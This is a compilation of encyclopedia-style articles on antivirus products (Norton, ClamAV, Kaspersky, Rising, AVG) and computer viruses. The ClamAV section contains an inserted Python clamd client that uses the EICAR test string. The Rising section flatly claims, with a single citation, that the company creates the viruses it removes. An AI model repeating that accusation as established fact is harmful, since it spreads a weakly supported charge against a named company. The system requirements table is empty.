Norton AntiVirus 11 for Mac introduced support for the Mac OS X v10.5 Leopard platform, with the capability to detect both Macintosh and Windows malware. Other features include a vulnerability scanner, which blocks attackers from leveraging software exploits.[23] Norton AntiVirus 11 also includes the ability to scan within compressed or archived files, such as Time Capsule volumes.

Operating requirements call for Mac OS X Tiger.[24] A PowerPC or an Intel Core processor, 128 MB of RAM, and 100 MB of free hard disk space are also required. Norton AntiVirus Dual Protection for Mac is intended for Macintosh users with Windows running on their systems, using Boot Camp or virtualization software such as VMware Fusion. It provides a license for both Norton AntiVirus 11 and Norton AntiVirus 2009.[25][26]

Criticisms

FBI and Magic Lantern

The FBI confirmed the active development of Magic Lantern, a keylogger intended to obtain passwords to encrypted e-mail and other documents during criminal investigations. Magic Lantern was first reported in the media by Bob Sullivan of MSNBC on 20 November 2001 and by Ted Bridis of the Associated Press.[27][28] The FBI intends to deploy Magic Lantern in the form of an e-mail attachment. When the attachment is opened, it installs a trojan horse on the suspect's computer, which is activated when the suspect uses PGP encryption, often used to increase the security of sent e-mail messages. When activated, the trojan will log the PGP password, which allows the FBI to decrypt user communications.[29][30] Symantec and other major antivirus vendors have whitelisted the Magic Lantern trojan, rendering their antivirus products, including Norton AntiVirus, incapable of detecting it. Concerns around this whitelisting include uncertainties about Magic Lantern's full surveillance potential and whether hackers could subvert it and redeploy it for purposes outside of law enforcement.[31][32]

Graham Cluley, a technology consultant from Sophos, said "We have no way of knowing if it was written by the FBI, and even if we did, we wouldn't know whether it was being used by the FBI or if it had been commandeered by a third party".[33] Another reaction came from Marc Maiffret, chief technology officer and cofounder of eEye Digital Security, who states: "Our customers are paying us for a service, to protect them from all forms of malicious code. It is not up to us to do law enforcement's job for them so we do not, and will not, make any exceptions for law enforcement malware or other tools."[34]

Proponents of Magic Lantern argue the technology would allow law enforcement to efficiently and quickly decrypt time-sensitive messages protected by encryption schemes. Implementing Magic Lantern does not require physical access to a suspect's computer, unlike Carnivore, a predecessor to Magic Lantern, since physical access to a computer would require a court order.[35] FBI spokesman Paul Bresson, in response to a question about whether Magic Lantern also needed a court order to deploy, would only say "Like all technology projects or tools deployed by the FBI it would be used pursuant to the appropriate legal process."[36][37]

Spotify flagged as a Trojan horse

The January 28, 2010 Symantec anti-virus update marked Spotify as a Trojan horse, disabling the software across millions of PCs.[1][2]

Customer service

Retail customers report slow and indifferent service on bugs. Examples include a faulty error message stating current subscriptions had expired.[38] Users received an error stating "Your virus protection cannot be updated." This error occurred after an update to the software and refused to allow daily updates.[38] Though the bug was reported in 2004, it was not corrected for the 2005 or 2006 versions.

Another incident occurred in May 2007, when Norton AntiVirus flagged components of the Pegasus e-mail client as malicious, rendering the program corrupted.[39] Symantec customer service addressed the problem by running through a checklist of troubleshooting steps which were not always successful.

Faulty update

On July 25, 2006, Symantec released a faulty update for Norton AntiVirus 2006 users. Users reported an onscreen message stating "Norton AntiVirus 2006 does not support the repair feature. Please uninstall and reinstall."[40] Symantec claimed the faulty update was downloaded to customers between 1:00 PM and 7:00 PM on July 25, 2006. Symantec developed a workaround tool and listed troubleshooting steps. The company released a statement saying they expected to deliver a repair patch to affected users by Monday, July 31, 2006.[41]

Uninstallation

Norton AntiVirus has been criticized for refusing to uninstall completely, leaving unnecessary files behind.[42][43] Another issue is that versions prior to 2009 installed LiveUpdate, which updates Norton-branded software, separately. The user must uninstall both Norton AntiVirus and the LiveUpdate component manually. The LiveUpdate component is purposely left behind to update other Norton-branded products, if present.[44] In response, Symantec developed the Norton Removal Tool to remove leftover registry keys and values along with files and folders.[45] However, neither route of uninstallation will remove subscription data, preserved to prevent users from installing multiple trial copies.

Incompatibility with ZoneAlarm

Norton AntiVirus 2007 will not install alongside ZoneAlarm. This incompatibility has caused annoyance for Norton customers who purchased Norton AntiVirus 2007 with no prior warning or notice of the incompatibility.[46] Symantec recommends removing ZoneAlarm, then reinstalling it with its Internet Worm Protection feature disabled; that feature controls which applications can access the Internet and which protocols they can use to do so.

PIFTS.exe

On March 9, 2009, some users of Norton AntiVirus 2006 and 2007 experienced a firewall warning stating that a Norton-associated file, "PIFTS.exe", was trying to connect to the Internet.[47] Although this file was revealed to be a harmless diagnostic patch, the program gained attention in the media when Symantec removed posts from their forum concerning PIFTS. With no information available about the purpose of the program, there was speculation that the program was malware or a backdoor.[48] The SANS Internet Storm Center claimed to have spoken to a Symantec employee who confirmed that "the program is theirs, part of the update process and not intended to do harm."[49] Graham Cluley, a consultant from antivirus vendor Sophos, found PIFTS connected to a Symantec server, forwarding product and computer information.[50]

On March 10, Symantec made an official response to the PIFTS program, claiming posts in the support forum were deleted due to forum spam rules; however, the deletion of PIFTS-related posts began before the spam attacks.[51] Symantec stated PIFTS itself was a diagnostic patch.[48] Cole stated the purpose of the update was to help determine how many customers would need to be migrated to Windows 7-compatible versions of Norton AntiVirus. PIFTS apparently was released without a digital signature to verify its identity, causing firewalls to prompt for permission when it attempted to connect to the Internet.[52]

Criticism

Symantec has been criticized for many ethical violations, mainly in its India support branch, whereby support technicians would tell customers inquiring about certain issues that their systems were infected and therefore needed a technician to remove the infection remotely for an extra fee of 99 euros, and would refuse a refund when, as in almost all cases, their systems were not infected.[53]

Clam AntiVirus
From Wikipedia, the free encyclopedia


Clam AntiVirus (ClamAV) is a free, cross-platform antivirus software tool-kit capable of detecting many types of malicious software, including viruses. One of its main uses is on mail servers as a server-side email virus scanner. The application was developed for Unix and has third party versions available for AIX, BSD, HP-UX, Linux, Mac OS X, OpenVMS, OSF and Solaris. As of version 0.96 ClamAV builds and runs on Microsoft Windows.[3][4] Both ClamAV and its updates are made available free of charge.

Sourcefire, a maker of intrusion detection products and the owner of Snort, announced on 17 August 2007 that it had acquired the trademarks and copyrights to ClamAV from five key developers.[5]
Features

ClamAV includes a number of utilities: a command-line scanner, an automatic database updater and a scalable multi-threaded daemon, all running on an anti-virus engine from a shared library.[3]

The application also features a Milter interface for sendmail and on-demand scanning. It has support for Zip, RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CHM, BinHex and SIS formats, most mail file formats, ELF executables and Portable Executable (PE) files compressed with UPX, FSG, Petite, NsPack, wwpack32, MEW and Upack, or obfuscated with SUE and Y0da Cryptor. It also supports many document formats, including Microsoft Office, HTML, Rich Text Format (RTF) and Portable Document Format (PDF).[3]

The ClamAV virus database is updated several times each day and as of 21 August 2010 contained 818,106 virus signatures.[3][6]

Effectiveness

ClamAV sometimes suffers from poor detection rates, and its scans are slow and less effective than some other antivirus programs (such as Avast! or AVG). For example, ClamAV failed to detect almost half of the Trojan horses, password stealers, and other malware in AV-Test.org's "zoo" of malware samples.[7]

ClamAV is occasionally included in comparative tests against other antivirus products. In the 2008 AV-Test it rated: on-demand: very poor; false positives: poor; on-access: poor; response time: very good; rootkits: very poor.[8] In 2007 Untangle ranked Clam 2nd out of 10, ahead of Symantec, F-Prot, Sophos, McAfee, GlobalHauri, Fortinet and SonicWall.[9] In the 1–21 June 2008 test performed by Virus.gr, ClamWin version 0.93 detected 54.68% of all threats and ranked 37th out of 49 products tested; the best scored over 99%.[10] In the 10 August–5 September 2009 test performed by Virus.gr, ClamWin version 0.95.2 detected 52.48% of all threats and ranked 43rd out of 55 products tested; the best scored 98.89%.[11]

Platforms

Linux/BSD

ClamAV is available for Linux and BSD-based operating systems.[3] In most cases it is available through the distribution's repositories for installation.

On Linux servers ClamAV can be run in daemon mode, servicing requests to scan files sent from other
processes. These can include mail exchange programs, files on Samba shares, or packets of data passing
through a proxy server (IPCop, for example, has an add-on called Copfilter which scans incoming packets for
malicious data).
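The daemon-mode exchange described above, as an added example that is not part of ClamAV or of this page: a Python client that frames clamd's zINSTREAM command, parses the daemon's verdict, and includes a constructed in-process stand-in for clamd so the exchange runs offline. The socket path and the EICAR sample are assumptions.

```python
"""Client for the ClamAV daemon (clamd) socket protocol.

Added example, not part of the ClamAV project. It frames a zINSTREAM request the
way clamd expects (NUL-terminated command, then chunks prefixed with a 4-byte
big-endian length, ended by a zero-length chunk) and parses the daemon's verdict.
"""
import socket
import struct
from typing import Iterator, NamedTuple, Optional

CLAMD_UNIX_SOCKET = "/var/run/clamav/clamd.ctl"  # assumed path; see LocalSocket in clamd.conf
CHUNK_SIZE = 8192
# EICAR test string: a harmless file every AV engine flags, used here as constructed input.
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

class ScanResult(NamedTuple):
    infected: bool
    signature: Optional[str]  # e.g. "Eicar-Test-Signature" when infected
    raw: str                  # daemon reply without the trailing NUL

def instream_frames(data: bytes, chunk_size: int = CHUNK_SIZE) -> Iterator[bytes]:
    """Yield the wire bytes of a zINSTREAM request carrying `data`."""
    yield b"zINSTREAM\0"
    for off in range(0, len(data), chunk_size):
        chunk = data[off:off + chunk_size]
        yield struct.pack(">I", len(chunk)) + chunk
    yield struct.pack(">I", 0)  # zero-length chunk terminates the stream

def parse_reply(reply: bytes) -> ScanResult:
    """Parse 'stream: OK', 'stream: <Name> FOUND' or an '... ERROR' reply."""
    text = reply.rstrip(b"\0").decode("ascii", errors="replace")
    if text.endswith(" FOUND"):
        _, _, verdict = text.partition(": ")
        return ScanResult(True, verdict[: -len(" FOUND")], text)
    if text.endswith(" OK"):
        return ScanResult(False, None, text)
    # e.g. "INSTREAM size limit exceeded. ERROR" when StreamMaxLength is hit
    raise RuntimeError(f"clamd error: {text!r}")

def scan_bytes(sock, data: bytes) -> ScanResult:
    """Stream `data` to clamd over a connected socket and return its verdict."""
    for frame in instream_frames(data):
        sock.sendall(frame)
    buf = b""
    while not buf.endswith(b"\0"):  # z-commands get NUL-terminated replies
        part = sock.recv(4096)
        if not part:
            raise RuntimeError("clamd closed the connection without a verdict")
        buf += part
    return parse_reply(buf)

def scan_file(path: str, socket_path: str = CLAMD_UNIX_SOCKET) -> ScanResult:
    """Scan a local file through the daemon (requires a running clamd)."""
    with open(path, "rb") as fh:
        data = fh.read()
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
        sock.connect(socket_path)
        return scan_bytes(sock, data)

class FakeClamd:
    """Constructed stand-in for clamd's INSTREAM handling, for offline demonstration.

    It reassembles the length-prefixed chunks as the daemon would and answers in
    the daemon's reply format; only the detection is a toy EICAR substring check.
    """
    def __init__(self) -> None:
        self.inbox = b""
        self.outbox = b""

    def sendall(self, frame: bytes) -> None:
        self.inbox += frame
        self._try_verdict()

    def recv(self, n: int) -> bytes:
        out, self.outbox = self.outbox[:n], self.outbox[n:]
        return out

    def _try_verdict(self) -> None:
        prefix = b"zINSTREAM\0"
        if not self.inbox.startswith(prefix):
            return
        body, pos, data = self.inbox[len(prefix):], 0, b""
        while pos + 4 <= len(body):
            (length,) = struct.unpack(">I", body[pos:pos + 4])
            pos += 4
            if length == 0:  # terminator seen: the whole stream has arrived
                found = EICAR in data
                self.outbox = b"stream: Eicar-Test-Signature FOUND\0" if found else b"stream: OK\0"
                return
            if pos + length > len(body):
                return  # chunk not complete yet; wait for more frames
            data += body[pos:pos + length]
            pos += length

if __name__ == "__main__":
    # Offline demo: a clean buffer and the EICAR test file sent to the stand-in daemon.
    for sample in (b"just some text\n", b"header" + EICAR + b"\n"):
        print(scan_bytes(FakeClamd(), sample))
```

Against a real daemon, `scan_file(path)` performs the same exchange over the Unix socket; clamd's StreamMaxLength setting bounds how much a single INSTREAM may carry.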

On Linux and BSD desktops ClamAV provides on-demand scanning of individual files, directories or the whole
PC.[3]

Mac OS X

Apple Mac OS X Server has included ClamAV since version 10.4. It is used within the operating system's email service. A graphical user interface is available in the form of ClamXav.[12] Additionally, Fink and MacPorts have ported ClamAV to the platform.

Another program which uses the ClamAV engine on Mac OS X is Counteragent. Working alongside the Eudora Internet Mail Server program, Counteragent scans emails for viruses using ClamAV and also optionally provides spam filtering through SpamAssassin.

OpenVMS

ClamAV for OpenVMS is available for DEC Alpha and Itanium platforms. The build process is simple and provides basic functionality, including the library, the clamscan utility, the clamd daemon and freshclam for updates.[13]

Windows

ClamAV for Windows is a joint project of ClamAV and Immunet which provides support for Windows XP, Vista, and 7. Unlike ClamWin it includes on-access scanning accomplished through cloud computing, which reduces the use of local PC memory.[14]

Graphical interfaces

Since ClamAV does not include a graphical user interface (GUI) but instead is run from the command line, a number of third-party developers have written GUIs for the application for various platforms and uses.

These include:

ClamTk 4.08 running on Ubuntu 9.04 Jaunty Jackalope

- Linux
  - ClamTk using gtk2-perl. The project takes its name from the Tk libraries that were used when it was first started.[15][16]
  - KlamAV for KDE[17]
  - wbmclamav is a webmin module[18] to manage Clam Antivirus
- Mac OS X
  - ClamXav is a freeware port which includes a graphical user interface and has a "sentry" service which can watch for changes or new files in many cases. There is also an update and scanning scheduler through a cron job facilitated by the graphical interface. ClamXav can detect Mac OS X-specific malware, as well as Unix-specific and Windows-specific malware, but the malware definitions for Mac OS X are not updated as often, with sometimes as much as a year passing between updates. However, the ClamXav application and the ClamAV engine are updated regularly.[19]
  - Tiger Cache Cleaner is shareware software which installs and presents a graphic interface for using ClamAV to scan for viruses, as well as providing other unrelated functions.
- Microsoft Windows
  - ClamWin
  - Graugon AntiVirus[20]
  - CS Antivirus[20]
  - Moon Secure AV[21]
  - Spyware Terminator[22]
- Miscellaneous
  - Untangle is an open source network gateway that uses ClamAV in its virus-scanning application.[23]
ClamWin

ClamWin running on Windows XP

ClamWin is a graphical user interface front end for ClamAV for Microsoft Windows built by ClamWin Pty Ltd. Features include on-demand (user started) scanning, automatic updates, scan scheduling, context menu integration to Explorer, and an add-in for Microsoft Outlook. To provide on-access scanning (scanning when a file is read or written), additional software must be used. Examples are Clam Sentinel and the free software called Winpooch.

Plugins for Mozilla Firefox which use ClamWin to scan downloaded files are also available.[24][25] Several other extensions allow users to process downloaded files with any software and scan the files with ClamWin.[26][27][28][29]

Patent lawsuit

Barracuda Networks is being sued by Trend Micro as of 2008 for its distribution of ClamAV as part of a security package.[30] Trend Micro claims that Barracuda's utilization of ClamAV infringes on a software patent for filtering viruses on an Internet gateway. The free software community has responded in part by calling for a boycott against Trend Micro. The boycott has been endorsed by the Free Software Foundation.[31] Barracuda Networks counter-sued with IBM-obtained patents in July 2008.[32]

Kaspersky Anti-Virus
From Wikipedia, the free encyclopedia


Kaspersky Anti-Virus (Russian: Антивирус Касперского; often referred to as KAV) is an antivirus program developed by Kaspersky Lab. It is designed to protect users from malware and is primarily designed for computers running Microsoft Windows and Mac OS X, though a version for Linux is available for business consumers.

Features

Kaspersky Anti-Virus features include real-time protection, and detection and removal of viruses, trojans, worms, spyware, adware, keyloggers, malicious tools and auto-dialers, as well as detection and removal of rootkits. It also includes instantaneous automatic updates via the "Kaspersky Security Network" service.

According to Kaspersky, "Kaspersky Security Network service allows users of Kaspersky Lab security products from around the world to help facilitate malware identification and reduce the time it takes to provide protection against new ("in the wild") security risks targeting your computer." Kaspersky Lab maintains a strict privacy policy for use of this service and asserts that the information volunteered through it "contains no personally identifiable information about the user and is utilized by Kaspersky Lab for no other purposes but to enhance its security products and to further advance solutions against malicious threats and viruses."

Windows users may download an Anti-Virus Rescue Disk that scans the host computer during booting inside an isolated Linux environment. In addition, Kaspersky Anti-Virus prevents itself from being disabled by malware without user permission via password access prompts upon disabling protection elements and changing internal settings. It also scans incoming instant messenger traffic, automatically disables links to known malware hosting sites while using Internet Explorer or Firefox, and includes free technical support and free product upgrades within paid-subscription periods. Kaspersky Lab currently offers 1 year, 2 year and 3 year subscriptions.

Awards

According to AV-Comparatives, Kaspersky Anti-Virus rates highly amongst virus scanners in terms of detection rates, even though the program failed two Virus Bulletin tests in 2007 and another two in 2008.[1] In addition, PC World awarded Kaspersky Anti-Virus 6 the Editor's Choice in its 2007 anti-virus comparative.[2] The well-known and highly regarded Ars Technica lists Kaspersky as one of the best choices for anti-virus on the Windows platform.[3]

Kaspersky Anti-Virus was "A-listed" by the UK PC journal PC Pro in late 2007, where it scored very highly for detection and removal of malware.[4] PC Pro attributes this to "a combination of the software's heuristic scanning and uncompromising approach to database updates.[4] While many packages check for new virus signatures on a daily basis, Kaspersky runs to an hourly schedule, improving your chances of being immunized before an infection reaches it."[5]

Kaspersky Anti-Virus was tested by PassMark in June 2008 and was credited as having "the industry's fastest scan times" on Windows Vista.

Limits

Kaspersky Anti-Virus lacks certain features found in Kaspersky Internet Security. These missing features
include a personal firewall, HIPS, AntiSpam, AntiBanner and parental control tools.

Also, Kaspersky, like the majority of its competitors, is incompatible with many other anti-virus and anti-
spyware software.[6]

Macintosh

The newly released Macintosh-capable edition of Kaspersky Anti-Virus is compatible with (Intel-processor-based) Mac OS X v.10.4 and higher, including the brand new version Mac OS X Snow Leopard, released in August 2009. Kaspersky Lab's internal testing concludes that it consumes only 1% CPU impact on performance, and it is designed to maintain a user-friendly Mac-like interface that Mac users are familiar with. Kaspersky Anti-Virus for Mac contains definitions to detect and block malware affecting Windows, Linux and Mac OS X alike. Kaspersky Anti-Virus for Mac also scans shared folders of users running Windows using Virtual PC on capable Apple Macintosh personal computers.[7]

Linux editions

An edition of Kaspersky's anti-virus solution for Linux workstations is available to business consumers.[8] It
offers many of the features included in the mainstream version for Windows, including on-access and on-
demand scanners.

Specialized editions of Kaspersky Anti-Virus are also available for a variety of Linux servers and offer
protection from most forms of malware.

System requirements

System requirements table (cell values are not recoverable from this copy). Columns: Windows XP (32/64-bit); Windows Vista (32/64-bit); Windows 7 (32/64-bit); Mac OS X (v.10.4.11 "Tiger" or higher); Linux (Red Hat, Mandriva, Fedora, Debian, SUSE). Rows: Processor; RAM; Free hard drive space.
A DVD-ROM or CD-ROM drive, Internet Explorer 5.5 or above and Windows Installer 2.0 or above are also required for the installation of Kaspersky Anti-Virus in Windows. The latest version can either be downloaded from their official website or purchased through retail.

The last version of Kaspersky Anti-Virus that still supported Windows Me was 6.0.2.621 and the last version that still supported Windows 2000 was 7.0.0.125.

Security flaws

- In 2005, two critical flaws were discovered in Kaspersky Anti-Virus. One could let attackers commandeer systems that use it.[9] The other allowed CHM files to insert malicious code.[10]

Rising AntiVirus
From Wikipedia, the free encyclopedia

Rising is a Chinese software company that produces the anti-virus software Rising AntiVirus, a firewall, UTM and spam-blocking products.

Founded in 1991, Rising is a privately-owned company, with its global headquarters based in Zhongguancun in Beijing, China. The company has subsidiaries and branch offices in Shanghai, Guangzhou, Australia and Beijing. It is one of China's largest anti-virus software companies, with over 500 employees and an estimated 50% of Chinese home users (of more than 100 million computer users). They also create the viruses they kill.[1]

Primary products are Rising Antivirus, Rising Personal Firewall, Rising UTM and Rising IS.

AVG (software)
From Wikipedia, the free encyclopedia

AVG is a family of anti-virus and Internet security software for the Microsoft Windows, Linux, Mac OS X, and FreeBSD computing platforms, developed by AVG Technologies, a privately held Czech company formerly known as Grisoft.[1]

History

The brand name AVG comes from Grisoft's first product, "Anti-Virus Guard", launched in 1992 in Czechoslovakia. In 1997, the first AVG licenses were sold in Germany and the UK. AVG was introduced in the U.S. in 1998.[2]

The AVG Free Edition helped raise awareness of the AVG product line.[3]

In 2006, the AVG security package grew to include anti-spyware, as AVG Technologies acquired ewido Networks, an anti-spyware group. That same year, Microsoft announced that AVG components would be available directly within the Windows Vista operating system.

AVG Technologies acquired Exploit Prevention Labs (XPL) in December 2007, and incorporated that company's LinkScanner safe search and surf technology into the AVG 8.0 security product range released in March 2008.

In January 2009, AVG Technologies acquired Sana Security, a developer of identity theft prevention software. This software was incorporated into the AVG security product range released in March 2009.

According to AVG Technologies, over 110 million users have AVG Anti-Virus protection,
including users of the Free Edition.[4]

Products

Desktop products

AVG Technologies provides a number of products from the AVG range, suitable for Windows 2000 onwards. In addition to this, AVG Technologies also provides Linux, FreeBSD, and most recently Mac OS X versions of the software. AVG Anti-Virus 9.0 is available in free and commercial editions. AVG 9.0 has identity theft protection through a partnership with Intersections Inc. AVG 9.0 also adds white listing, behavioral protection and cloud operations to its signature-based blocking. The software adds the Resident Shield, firewall, and identity protection modules. The LinkScanner component has been improved to cut phishing threats further.[5]

For desktop protection of PCs running Windows, the AVG solutions include:

- AVG Internet Security is a full suite which brings together the AVG Anti-Virus, Anti-Spyware, LinkScanner, Anti-Rootkit, Web Shield, Security Toolbar, Firewall, Anti-Spam, Identity Protection and System Tools protection components.
- AVG Identity Protection provides protection against identity theft and unknown malware threats using behavioral monitoring.
- AVG Anti-Virus plus Firewall provides the Anti-Virus, Anti-Spyware, LinkScanner, Anti-Rootkit, Web Shield, Security Toolbar and Firewall protection components.
- AVG Anti-Spyware was a rebranded version of ewido Anti-Spyware,[6] that was integrated into AVG Anti-Virus as of version 8.0. A free version was also available, having now been merged into AVG Anti-Virus Free Edition.
- AVG Anti-Rootkit was a free anti-rootkit program that was discontinued as of late 2006. Like AVG Anti-Spyware, it has now been merged into AVG Anti-Virus.
- AVG's remote administration tool allows the software to be managed centrally on networks.
- AVG Anti-Virus provides the Anti-Virus, Anti-Spyware, LinkScanner, Anti-Rootkit, Web Shield, and Security Toolbar protection components.
- Like other security products, AVG disables Windows Defender.
- AVG Anti-Virus Free Edition provides basic Anti-Virus and Anti-Spyware protection, plus the full AVG LinkScanner safe search and surf technology. There are some limitations with AVG Anti-Virus Free Edition compared to the commercial versions of AVG products and other free antivirus. These limitations include:
  - Less protection – AVG Anti-Virus Free Edition provides the same anti-virus and anti-spyware scanning engine as the commercial product; however, it lacked anti-rootkit protection until 2010. The older 7.5 Free Edition is perfectly capable of finding and disabling rootkits based on signatures, but cannot scan for rootkit-like activity. The 8.5 version of AVG Anti-Virus Free Edition lacks any anti-rootkit capability. While there is no official protection for files from messaging sources, the Resident Shield component automatically scans files before they are opened or copied.
  - Infrequent updates – AVG Anti-Virus Free Edition receives updates via a lower priority service. Priority updating via high-speed servers is only available for the commercial versions of AVG products.
  - No telephone or e-mail technical support – There is no telephone or e-mail technical support provided by AVG for users of AVG Free Edition products anywhere in the world. AVG Free Edition users have access to support via the self-help AVG Free Forum.
  - Less customization – Scheduling options in AVG Anti-Virus Free Edition are very limited (only one scheduled update per day). However, the AVG Resident Shield configuration allows exclusions. The on-demand/scheduled scanner allows advanced testing options such as heuristics and reporting of password-protected archives. Process priority for on-demand/scheduled scans can be dynamically adjusted over three different configurations.
  - No server support – AVG Anti-Virus Free Edition cannot be installed on server operating systems (such as Windows Server 2003), nor can it be used for the scanning of network drives. Note that the newer AVG 2011 free edition can be installed on server operating systems like Windows Server R2.
  - AVG Anti-Virus Free Edition is only licensed for home and non-commercial use on a single computer.

AVG Free Edition has previously been responsible for popup ads advertising the non-free versions of AVG Anti-Virus and AVG Internet Security, which claim to provide more comprehensive levels of protection.[7][8] AVG Anti-Virus 8.5 Free Edition users are now also subject to a daily pop-up advertising campaign for a "recommended upgrade" to AVG Internet Security. A "manager" on the AVG free version forum states that this advertisement appears once per day for one month each year.[9]

All versions of the AVG products, excluding AVG Anti-Rootkit Free Edition (now
discontinued), are compatible with the 64-bit edition of Windows.

Server products

AVG Technologies also sells AVG anti-virus and Internet security solutions for web/file servers or email servers running either Linux, FreeBSD or Windows.

- AVG Internet Security Business Edition provides centrally controlled protection for workstations and file servers, e-mail server and Microsoft SharePoint server protection, plus e-mail server based anti-spam protection.
- AVG Anti-Virus Business Edition provides centrally controlled anti-virus and anti-spyware protection for workstations and file servers.
- AVG File Server Edition provides anti-virus and anti-spyware protection for file servers.
- AVG Email Server Edition provides anti-virus and anti-spyware protection for e-mail servers, plus e-mail server based anti-spam protection.
AVG Linux/FreeBSD

With Version 7.5, AVG Technologies is providing a solution for FreeBSD for the first time. AVG Technologies has incorporated spam detection in addition to virus detection for its Linux/FreeBSD software.

Features

AVG features most of the common functions available in modern anti-virus and Internet
security programs, including periodic scans, scans of sent and received emails (including
adding footers to the emails indicating this), the ability to "repair" some virus-infected files,
and a "virus vault" in which infected files are held (A quarantine area; also known as a "virus
chest").

LinkScanner

The patent-pending LinkScanner technology, acquired from Exploit Prevention Labs and built into most AVG products, provides real-time protection against exploits and drive-by downloads. LinkScanner includes Search-Shield, a safe search component that places safety ratings next to each link in Google, Yahoo! and MSN search results, plus Active Surf-Shield, a safe surf component that scans the contents of a web site in real time to ensure it is safe to open.[10] A faulty upgrade in 8.0.233 causing users to lose internet access, as well as concerns regarding web analytics, have made LinkScanner a controversial component (see "Link Scanner Concerns").

Link Scanner Concerns

Initial AVG Anti-Virus upgrades for version 8.0.233 contained a malfunction in the AVGNSX.exe process, blocking network activity and internet access. The AVGNSX.exe process is part of the LinkScanner utility. Current versions of AVG are unaffected, as the product is at revision 9.0.xxx.

When AVG 8.0 was first released, its LinkScanner safe search feature was shown to cause an increase in traffic on web sites that appear high in search engine results pages. Since LinkScanner disguises the scans as coming from an Internet Explorer 6 browser when it prescans each site listed in the search results, web site usage logs showed incorrect and overinflated site visitor statistics. The prescanning of every link in search results also caused web sites to transfer more data than usual, resulting in higher bandwidth usage for web site operators and slow performance for users.[11] AVG initially said site administrators would be able to filter the LinkScanner traffic out of their site statistics, leaving the problem of excess bandwidth usage still to be solved.[12] Pay-per-click advertising was not affected by the increase in traffic.[13]

In response to complaints, AVG announced that as of July 9, 2008 "Search-Shield will no longer scan each search result online for new exploits, which was causing the spikes that webmasters addressed with us",[14] releasing a new build on that date that applies a local blacklist, then prefetches and scans only those links clicked on by the user.[15]

Resource requirements

AVG had been known for its conservative resource requirements during its version 6.0 run. The AVG Anti-Virus Professional Edition required 16 MB of RAM and 20 MB of space on the hard drive.

Version 7.5 of AVG Free requires a Pentium (or compatible) CPU with 300 MHz and between 64 and 256 MB of RAM, depending on operating system (at least 64 MB with Windows 9x, at least 128 MB with Windows 2000 or newer, with more RAM recommended).[16]

An additional caveat with version 7.5 in Windows XP, which is a multi-user system that allows more than one user to be logged in at a time, is that scheduled scans ran as separate processes, which created a situation in which there were two scheduled scans, one in each active account, running simultaneously and causing heavy hard disk throttling and considerable system lag. This fault was finally fixed in version 8.0 of the program.

Currently, both AVG Anti-Virus and AVG Internet Security require at least 256 MB of RAM for the computer as a minimum.[17][18] The comparatively high use of paged physical RAM has led to crashes with some software, such as the Half-Life 2 series.[19]

Issues

- When uninstalling AVG version 7 or 8 in Windows XP/Vista and attempting to install other anti-virus programs such as Kaspersky Anti-Virus or Norton AntiVirus, the latter programs will not install. Instead, they show an "incompatible software installed" error even if the uninstalled software has been removed using the control panel. This happens because software that updates and changes can add registry entries that were not added when the product was originally installed (therefore the uninstaller is unaware of the registry keys).[20]
- A signature update dated November 9, 2008, crippled some computers, as it caused the software to treat "user32.dll", a major component of Windows XP/Vista, as a trojan and advise users to delete it. Users who deleted the file in question were put in a continuous reboot loop. The problem was rectified a few days later with a new signature database, and further safeguards were added to the product (270.9.0/1778).[21]
- Towards the end of July 2009, a software update caused the program to inform users that iTunes was infected[22] with a non-existent virus, Small.BOG. If users followed the recommended instructions, it would remove critical DLL files and corrupt the iTunes installation.[23]
- An update of AVG 2011 resulted in Windows 7 64-bit systems being bricked, leaving machines in a continuous reboot loop. The update has now been removed.[24]
Reception

- AVG Anti-Virus was certified by ICSA Labs.[25]
- It was tested 43 times, from February 1998 through May 2003, by Virus Bulletin and failed 22 times and passed 21 times. During the period from June 2003 to April 2008, it was tested 23 times, passing 20 times and failing 3 times.[26]
- AVG won a Highly Commended award in the Australian PC Authority magazine 2007 Reliability and Service Awards, Best Software category (over 14,000 survey respondents), with an 89% satisfaction rating. It was beaten only by Firefox in satisfaction (93%).[27]
- At PCWorld.com AVG 7.5 received a 77/100. It did a "fine job" in disinfection tests, but ranked last of the ten products tested in proactive protection using one-month-old signature files.[28]

Computer virus
From Wikipedia, the free encyclopedia

A computer virus is a computer program that can copy itself and infect a computer.[1] The term "virus" is also commonly but erroneously used to refer to other types of malware, including but not limited to adware and spyware programs that do not have the reproductive ability. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive.[2]

Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.[3][4]

As stated above, the term "computer virus" is sometimes used as a catch-all phrase to include all types of malware, even those that do not have the reproductive ability. Malware includes computer viruses, computer worms, Trojan horses, most rootkits, spyware, dishonest adware and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan horse is a program that appears harmless but hides malicious functions. Worms and Trojan horses, like viruses, may harm a computer system's data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious or simply do nothing to call attention to themselves. Some viruses do nothing beyond reproducing themselves.

History

Academic work
The first academic work on the theory of computer viruses (although the term "computer virus" was not invented at that time) was done by John von Neumann in 1949 who held lectures at the University of Illinois about the "Theory and Organization of Complicated Automata".[5] The work of von Neumann was later published as the "Theory of self-reproducing automata". In his essay von Neumann postulated that a computer program could reproduce.

In 1972 Veith Risak published his article "Selbstreproduzierende Automaten mit minimaler Informationsübertragung" (Self-reproducing automata with minimal information exchange).[6] The article describes a fully functional virus written in assembler language for a SIEMENS 4004/35 computer system.

In 1980 Jürgen Kraus wrote his diplom thesis "Selbstreproduktion bei Programmen" (Self-reproduction of programs) at the University of Dortmund.[7] In his work Kraus postulated that computer programs can behave in a way similar to biological viruses.

In 1984 Fred Cohen from the University of Southern California wrote his paper "Computer Viruses - Theory and Experiments".[8] It was the first paper to explicitly call a self-reproducing program a "virus"; a term introduced by his mentor Leonard Adleman.

An article that describes "useful virus functionalities" was published by J. B. Gunn under the title "Use of virus functions to provide a virtual APL interpreter under user control" in 1984.[9]

Science fiction
